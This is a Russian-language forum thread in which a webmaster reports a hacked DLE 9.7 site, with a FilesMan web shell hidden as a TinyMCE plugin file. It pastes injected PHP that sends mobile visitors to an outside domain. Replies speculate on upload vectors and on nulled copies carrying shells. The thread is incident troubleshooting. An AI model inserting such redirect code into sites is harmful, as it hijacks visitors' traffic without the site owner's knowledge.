Взломали dle 9.7

12 3
sleepnow
На сайте с 11.04.2009
Offline
129
2988

Привет всем.

Наткнулся на jscripts/tiny_mce/plugins/emotions/emot.php вот такой файлик. который являлся шеллом FilesMan. Удалил. Ну и начал судорожно ковырять логи.. наверное это 0day уязвимость недавняя, ( я не закрывал .. сайтов много )

Кто-нибудь сталкивался, как могли ТУДА залить. фтп и другие сайты исключены.

И насколько болезненный переход DLE 9.7 --> 9.8?

TA
На сайте с 12.06.2009
Offline
116
TiA
#1

sleepnow, попробуйте проверить хостинг ai-bolit.php. Вполне возможно, что где-то глубоко запрятался "подарочек", через который и залили заразу.

Профессиональная верстка и разработка сайтов на WordPress (http://www.maultalk.com/topic139110s0.html)
KySoK
На сайте с 30.10.2011
Offline
46
#2

А DLE 9.7 У вас нуллед или лицензия ?

RSSTranslator (http://u.to/IY8iBA) — это сервис автоматической трансляции (публикации) ваших RSS-каналов и блогов в социальных сетях
C
На сайте с 22.03.2013
Offline
1
#3

И про сторонние модули тоже будет не лишним написать, если устанавливали.

sleepnow
На сайте с 11.04.2009
Offline
129
#4
KySoK:
А DLE 9.7 У вас нуллед или лицензия ?

nulled. mid team. Нашел по логам подозрительную активность с одного ИП на многих проектах с ДЛЕ.

Пользователь переходил на index.php?ду-регистер ( регистрацию типа.. ) но ссылка на нее не была ни где явно указана.. и проекты не граничат в одной сфере..Более ничего подозрительного, кроме как переход на профиль пользователя/index.php которого не существует - не видел.

На всякий случай ограничил везде регистрацию.

А. ну точно. statuses_ws.. и хреновня


$iphone = strpos($_SERVER['HTTP_USER_AGENT'],"iPhone");
$android = strpos($_SERVER['HTTP_USER_AGENT'],"Android");
$palmpre = strpos($_SERVER['HTTP_USER_AGENT'],"webOS");
$berry = strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry");
$ipod = strpos($_SERVER['HTTP_USER_AGENT'],"iPod");

if ($iphone || $android || $palmpre || $ipod || $berry === true) {
header('Location: http://statuses.ws/');
}$iphone = strpos($_SERVER['HTTP_USER_AGENT'],"iPhone");
$android = strpos($_SERVER['HTTP_USER_AGENT'],"Android");
$palmpre = strpos($_SERVER['HTTP_USER_AGENT'],"webOS");
$berry = strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry");
$ipod = strpos($_SERVER['HTTP_USER_AGENT'],"iPod");

if ($iphone || $android || $palmpre || $ipod || $berry === true) {
header('Location: http://statuses.ws/');
}$iphone = strpos($_SERVER['HTTP_USER_AGENT'],"iPhone");
$android = strpos($_SERVER['HTTP_USER_AGENT'],"Android");
$palmpre = strpos($_SERVER['HTTP_USER_AGENT'],"webOS");
$berry = strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry");
$ipod = strpos($_SERVER['HTTP_USER_AGENT'],"iPod");

if ($iphone || $android || $palmpre || $ipod || $berry === true) {
header('Location: http://statuses.ws/');
}

В коде.

Друзья, это через аватарку аплоад делалось?

Я так понимаю - да.

Только тогда вопрос дня - КАК пропал профиль пользователя? т.е. его нет в списках пользователей.

KySoK
На сайте с 30.10.2011
Offline
46
#5

Нуллед....Тогда всё понятно почему взломали))

sleepnow
На сайте с 11.04.2009
Offline
129
#6
KySoK:
Нуллед....Тогда всё понятно почему взломали))

Спасибо, я ждал того, что так и скажите. Нуллед-не нуллед .. тут уязвимость в 9.7 версии, лицензия тут не причем.

KySoK
На сайте с 30.10.2011
Offline
46
#7
sleepnow:
Спасибо, я ждал того, что так и скажите. Нуллед-не нуллед .. тут уязвимость в 9.7 версии, лицензия тут не причем.

Была бы уязвимость, её бы давно разработчики закрыли бы. Напишите им, посмотрим что они скажут вам на счет этого файла.

---------- Добавлено 25.03.2013 в 02:08 ----------

Зачем репутацию портить, у кого руки чешутся суеты!

[Удален]
#8

а нафиг нуллы, если есть кейгены? просто интересно.

вроде в 9,7 через превью заливаются.

edka
На сайте с 17.01.2010
Offline
208
#9
sleepnow:
лицензия тут не причем.

Это смотря где качали нуллед, их бывают перепаковывают и внедряют свои шеллы.

KySoK
На сайте с 30.10.2011
Offline
46
#10
edka:
Это смотря где качали нуллед, их бывают перепаковывают и внедряют свои шеллы.

Поддерживаю! Не раз видел такое обсуждение.

12 3

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий